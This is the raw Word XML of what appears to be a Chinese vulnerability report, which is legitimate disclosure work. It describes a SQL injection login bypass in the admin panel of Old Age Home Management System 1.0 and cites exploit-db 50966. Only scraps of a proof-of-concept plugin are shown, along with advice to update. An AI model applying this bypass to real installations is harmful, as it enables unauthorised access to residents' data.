    <w:p w14:paraId="47F2B7EF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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45872D28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</w:r>
      <w:r>
        <w:tab/>
        <w:t>output.fail('Internet nothing returned')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDC2F7F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ab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3316FE6B" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D0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</w:p>
    <w:p w14:paraId="142B1C46" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D0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</w:p>
    <w:p w14:paraId="54E87542" w14:textId="77777777" w:rsidR="002D00D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t>register(TestPOC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E737EB" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc25120"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38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1644"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="1740"/>
        <w:gridCol w:w="1569"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D00DD" w14:paraId="45F53470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559357E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1E2F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0AAC5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1C28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SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注入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2D82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9B2E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2D00DD" w14:paraId="1E7B42C4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AE988EC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B694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71485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1A77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33A7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6137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2D00DD" w14:paraId="2705FA19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9BD0D20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801B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872D5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4C38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4AB71D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CB45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2D00DD" w14:paraId="5EC950FA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B58575E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7328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AC6B6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ED4A" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD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CFA10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AE9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oahms</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D00DD" w14:paraId="1DD331FB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C3479D5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D99D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color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
              </w:rPr>
              <w:t>Old Age Home Management System</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D00DD" w14:paraId="2983FE6F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A312AC6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B76F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</w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId11" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                </w:rPr>
                <w:t>https://www.exploit-db.com/exploits/50966</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D00DD" w14:paraId="2E624317" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="41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7C4AB63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BE3E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color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
              </w:rPr>
              <w:t>Old Age Home Management System</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1.0 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>登录存在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>注入漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D00DD" w14:paraId="76371A54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AB498C8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F8D0" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000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color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
              </w:rPr>
              <w:t>Old Age Home Management System 1.0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
              </w:rPr>
              <w:t>后台管理员的登录界面存在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
              </w:rPr>
              <w:t>注入漏洞，一旦攻击者得到了后台的路径便可以直接通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
              </w:rPr>
              <w:t>注入的方式绕过登录机制，进入后台，从而对数据库和服务器产生危害。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D00DD" w14:paraId="3CE84E2B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AF9EF65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B84E" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="A7"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId12" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                </w:rPr>
                <w:t>https://www.exploit-db.com/exploits/50966</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D00DD" w14:paraId="29E9A858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70BAC8D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6A66" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId13" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:hint="eastAsia"/>
                </w:rPr>
                <w:t>https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/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hyperlink r:id="rId14" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:hint="eastAsia"/>
                </w:rPr>
                <w:t>https://phpgurukul.com/projects/Old-Age-Home-MS-using-PHP.zip</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D00DD" w14:paraId="6D05C566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3EBF0EB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1CA6" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000"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 w:rsidR="002D00DD" w14:paraId="5E549995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172C3A2" w14:textId="77777777" w:rsidR="002D00DD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CEC7" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/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关注厂商版本的版本更新，及时更新到最新版本。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E94DB8B" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD"/>
    <w:p w14:paraId="5FB74B58" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD"/>
    <w:sectPr w:rsidR="002D00DD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E95D" w14:textId="77777777" w:rsidR="00FB11F5" w:rsidRDefault="00FB11F5">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5E89EE3A" w14:textId="77777777" w:rsidR="00FB11F5" w:rsidRDefault="00FB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E408" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pStyle w:val="a3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2CE128" wp14:editId="6BC67E3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4F726" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
                          <w:pPr>
                            <w:pStyle w:val="a3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2CE128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8E4F726" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
                    <w:pPr>
                      <w:pStyle w:val="a3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C329" w14:textId="77777777" w:rsidR="00FB11F5" w:rsidRDefault="00FB11F5">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2C2B05B6" w14:textId="77777777" w:rsidR="00FB11F5" w:rsidRDefault="00FB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4C74" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pStyle w:val="a4"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="718B3B09" wp14:editId="0564B2D2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C4CA55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5C4CA55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97152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5D969B9"/>
    <w:rsid w:val="001277A1"/>
    <w:rsid w:val="001503F0"/>
    <w:rsid w:val="002D00DD"/>
    <w:rsid w:val="004953C9"/>
    <w:rsid w:val="004C741B"/>
    <w:rsid w:val="00517E86"/>
    <w:rsid w:val="005E78E8"/>
    <w:rsid w:val="00633FDD"/>
    <w:rsid w:val="006373B3"/>
    <w:rsid w:val="00645E2B"/>
    <w:rsid w:val="006953BC"/>
    <w:rsid w:val="006A330F"/>
    <w:rsid w:val="00830326"/>
    <w:rsid w:val="00886F98"/>
    <w:rsid w:val="008D5D8F"/>
    <w:rsid w:val="00A72F07"/>
    <w:rsid w:val="00B03A01"/>
    <w:rsid w:val="00B46086"/>
    <w:rsid w:val="00B60DA3"/>
    <w:rsid w:val="00E37F57"/>
    <w:rsid w:val="00E97D13"/>
    <w:rsid w:val="00E97D68"/>
    <w:rsid w:val="00F33EA6"/>
    <w:rsid w:val="00FB11F5"/>
    <w:rsid w:val="00FD119F"/>
    <w:rsid w:val="02AF01BF"/>
    <w:rsid w:val="05D969B9"/>
    <w:rsid w:val="086A007C"/>
    <w:rsid w:val="09CA347F"/>
    <w:rsid w:val="0D8419EE"/>
    <w:rsid w:val="15DE3D80"/>
    <w:rsid w:val="252424BD"/>
    <w:rsid w:val="2F8E4F50"/>
    <w:rsid w:val="344416FF"/>
    <w:rsid w:val="37B74831"/>
    <w:rsid w:val="3EAE274A"/>
    <w:rsid w:val="45306C87"/>
    <w:rsid w:val="4D5E093E"/>
    <w:rsid w:val="562522C8"/>
    <w:rsid w:val="587310CB"/>
    <w:rsid w:val="5D652628"/>
    <w:rsid w:val="61EF7540"/>
    <w:rsid w:val="6C814395"/>
    <w:rsid w:val="6CA850CC"/>
    <w:rsid w:val="6F871FE7"/>
    <w:rsid w:val="71305E2E"/>
    <w:rsid w:val="72320FFF"/>
    <w:rsid w:val="72FE5900"/>
    <w:rsid w:val="777D7D00"/>
    <w:rsid w:val="78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D6E1D"/>
  <w15:docId w15:val="{53292A62-7FA0-440C-8E93-112E2977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9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:beforeLines="100" w:before="100" w:afterLines="100" w:after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9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="3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20">
    <w:name w:val="Body Text Indent 2"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:ind w:firstLineChars="200" w:firstLine="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:color w:val="000000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Pr>
      <w:b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A7">
    <w:name w:val="A表格文字居中"/>
    <w:basedOn w:val="a"/>
    <w:qFormat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hpgurukul.com/old-age-home-management-system-using-php-and-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xploit-db.com/exploits/5096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xploit-db.com/exploits/5096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hpgurukul.com/projects/Old-Age-Home-MS-using-PHP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pgurukul.com/old-age-home-management-system-using-php-and-mysql/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://phpgurukul.com/projects/Old-Age-Home-MS-using-PHP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袁 铭泽</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-22T03:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-22T03:34:00Z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566F2827FA684265A69FC4206AB481B3</vt:lpwstr>
  </property>
</Properties>
</file>